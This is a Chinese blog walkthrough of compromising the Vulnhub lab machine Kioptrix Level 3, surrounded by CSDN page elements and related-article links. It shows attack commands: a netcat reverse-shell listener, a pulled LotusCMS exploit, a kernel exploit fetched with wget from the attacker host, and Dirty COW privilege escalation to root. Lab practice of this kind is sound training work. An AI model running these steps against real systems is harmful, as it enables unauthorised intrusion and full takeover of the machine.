Vulnhub系列-Kioptrix-Level-3

最新推荐文章于 2023-04-05 14:50:16 发布
最新推荐文章于 2023-04-05 14:50:16 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: Vulnhub系列 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZXT2804567059/article/details/122027767
版权

靶机:192.168.249.131
kali: 192.168.249.132

一、信息收集

nmap -sV 192.168.249.131开放80端口
请添加图片描述
访问下,发现是个
LotusCMS
search LotusCMS在msf中查找LotusCMS有关漏洞
请添加图片描述
set URI /-这里需要把URL路径改为/
请添加图片描述
run ----貌似出问题了,无法shell --没有解决
请添加图片描述
最后百度了下LotusCMS的exp

二、0x00漏洞利用(LotusCMS漏洞)

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit
请添加图片描述
`

请添加图片描述
nc -lvp 7777先开启监听端口7777
请添加图片描述
python -c "import pty;pty.spawn('/bin/bash')" 成功弹到shell 优化终端
请添加图片描述

三、0x01提权(脏牛提权)

uname -a查看内核(2.6.24-24)
searchsploit privilege | grep linux | grep 2.6.2 **–**查找有无可利用漏洞
请添加图片描述

先将40839.c先wget到本地后再wget到靶机上–

cd /tmp 权限问题 先到靶机tmp目录

wget http://192.168.249.132:8000/40839.c --这里使用的是SimpleHTTPServer
gcc -pthread 40839.c -o 40839 -lcrypt–按照40839.c的注释进行编译
请添加图片描述

./40839 123456 –设置firefart用户密码为123456
请添加图片描述
ssh firefart@192.168.249.131 —SSH连接成功root权限
请添加图片描述

{Yasso}
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kioptrix Level 3 靶机wp
m0_52496313的博客
08-14 301
Kioptrix Level 3 靶机wp
vuInhub靶场实战系列-Kioptrix Level #3
06-10
vuInhub靶场实战系列-Kioptrix Level #3
VulnHub——Kioptrix Level 3
江左盟的博客
05-28 2909
目录 简介 信息收集 漏洞检测与利用 权限提升 总结 简介 该靶机还是一如既往的简单,通过信息收集发现Web服务使用LotusCMS,使用Google搜索发现存在已知漏洞,通过漏洞利用脚本获得webshell,然后通过内核漏洞直接提升权限到root。 信息收集 探测目标主机IP地址,如图: 然后对目标主机进行快速端口扫描,发现开启22和80端口,OpenSSH版本4.7p1,Apache版本2.2.8,PHP版本5.2.4-2,操作系统可能为Debian或Ubuntu,内核版本为2.
Vulnhub靶机 kioptrix level 3
菜浪马废的博客
04-09 462
简介里说了 先要配置hosts 找靶机扫端口 80 22 登录界面 LotusCMS 搜漏洞 searchsploit Lotus 直接msf 设置RHOSTS、URI search lotus use exploit/multi/http/lcms_php_exec show options set RHOSTS 192.168.0.128 set URI / run ...
Kioptrix: Level 3靶机实战 lotu cms +sql注入 getshell ht编辑器有root权限,修改/etc/sudoers文件使当前用户具有root权限 提权
YouthBelief的博客
11-25 2226
Kioptrix: Level 3靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口1.3 目录遍历0x02 漏洞探测2.1 访问 80端口2.1.1 登录功能查看2.1.1.1cms漏洞搜索2.1.1.2 msf利用2.1.2 点击网页功能点2.1.2.1列数和回显点数据库数据表可能存在用户名密码的表的字段账号密码或者用sqlmap2.1.3 登录loneferret账号0x03 提权 前言 Kioptrix: Level 3 (#1): 靶机地址 https://www.vu
Kioptrix-3 ( 补漏 )
猎荒者
03-18 903
淫漫则不能励精,险躁则不能治性。 上次目录扫描得到数据库登录界面和用户登录界面,普通的字典爆破思路不可取,所以接下来是通过挖掘 web 漏洞得到用户登录的账密。 在 /gallery 目录找到一个疑似 SQL 注入漏洞 使用 sqlmap 对目标 URL 进行漏扫 PS: 使用 sqlmap 之前现在 Kali 的 /etc/hosts 文件中添加进靶机 IP 和域名的映射,不然可能扫不出...
vuInhub靶场实战系列-Kioptrix Level #2
06-09
vuInhub靶场实战系列-Kioptrix Level #2
vuInhub靶场实战系列-Kioptrix Level #1
06-08
vuInhub靶场实战系列-Kioptrix Level #1
vuInhub靶场实战系列-Kioptrix Level #4
最新发布
06-12
vuInhub靶场实战系列-Kioptrix Level #4
AC-DC-AC 3-LEVEL PWM CONVERTER
04-14
AC-DC-AC 3-LEVEL PWM CONVERTER
Vulnhub靶机系列Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 靶机设置 老规矩,开启虚拟机前分配一个和攻击机一样的网卡,选择我已移动该虚拟机;开启虚拟机后,netdiscover确认一下目标,我的靶机ip为192.168.190.189 靶机描述里还要配置host指向kioptrix3.com vim /etc/hosts 利用知识及工具 信息收集并getsh
KIOPTRIX: LEVEL 3通关详解
arcuied
04-05 163
KIOPTRIX: LEVEL 3通关详解
Vulnhub系列:kioptrixVM3
Fuzz
08-10 2456
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为OSCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 运行环境 kali:192.168.44.128 靶机:192.168.44.134 相关知识点 0x00、信息收集 主机发现:nmap -sP 192.168.44.0/24 端口扫描:nmap -sS -sV 192.168.44.134 0
vulnhub KioptrixVM3 靶场练习&LotusCMS漏洞分析
鸥鹭忘机
09-19 2166
前言 这次练习的靶机是vulnhub平台下KiptrixVM3,下载地址为https://www.vulnhub.com/entry/kioptrix-level-12-3,24/。该靶机漏洞较多,获取shell的方法多种多样。相对来说比较简单的一种方法就是通过SQL注入获取账号和密码,然后用这些账号密码尝试ssh登陆靶机,本次对靶机的渗透采用的就是SQL注入的方法。SQL注入的原理比较简单,这里就不做过多的介绍,我会在后面重点分析文件包含和远程代码执行漏洞。 该靶机导入VMware不会分配到IP地址,因为
类OSCP靶机-KioptixVM3(LotusCMS漏洞)
ETO发展中心
08-23 1251
靶机练习 1.通过对目标主机扫描发现80端口存在WEB 登录界面看到了lotusCMS 通过exploit搜索lotusCMS发现存在一个远程代码执行漏洞:https://www.exploit-db.com/exploits/18565.但是给到的EXP为msfconsole(之前讲过尽量不使用metasploit)可以直接利用,我们这里编写的exp来获取shell。 from requests import get import re import random from urllib import
Kioptrix 3
猎荒者
03-17 596
夫学须静也,才须学也; 非学无以广才,非志无以成学 00 环境准备 Kali(IP:10.10.16.128) Koiptrix 靶机 NAT 网络连接 01 主机发现 nmap -sP 10.10.16.0/24 02 端口扫描 nmap -A -v -sS -sV -p- -T4 10.10.16.153 开放 22(ssh)/ 80(http) 端口 03 目录扫描 dirb ...
OSCP - Typhoon 1.02 的破解
kevinhanser
04-14 1403
本文主要记录对 Typhoon 1.02 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com 博客集:面向 CTF 的 VM 破解系列 下载链接:Typhoon 1.02 VM - Typhoon 1.02 的破解 2019年4月13日22:18:40 【原创】 1. 官方描述 Typhoon Vulnerable VM 名字:Typhoon Typhoon VM c...
driftingblues6靶机(脏牛漏洞)
m0_66299232的博客
01-04 574
这段英文的意思是,警告“strftime():依赖系统的时区设置是不安全的。如果您使用了这些方法中的任何一种,并且仍然收到此警告,您很可能拼写错误了时区标识符。我们现在选择了时区“UTC”,但请设置date.timezone以选择您的时区。5.用unzip解压发现需要密码,那我们用fcrackzip,暴力破解。然后又改了密码,改完之后好像这个交互式界面又不能用了,也许命令在执行中。8.发现content下面的files能上传文件,上传我们的木马。6.正当我要上传dirty.c时,我的交互式界面不能用了。
kali渗透综合靶机(九)--Typhoon靶机
W小哥
03-27 4440
一、靶机下载 下载链接:https://download.vulnhub.com/billu/Billu_b0x.zip 二、Typhoon靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.129 靶机IP:192.168.212.9 1、主机...
man-g-board level modules
11-17
man-g-board level modules是一种模块化的学习系统,可以帮助学生在不同学习领域内快速提高他们的能力。这个系统通过结合在线学习资源、练习题目和测验等方式,为学生提供个性化的学习体验。 man-g-board level ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

{Yasso}

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值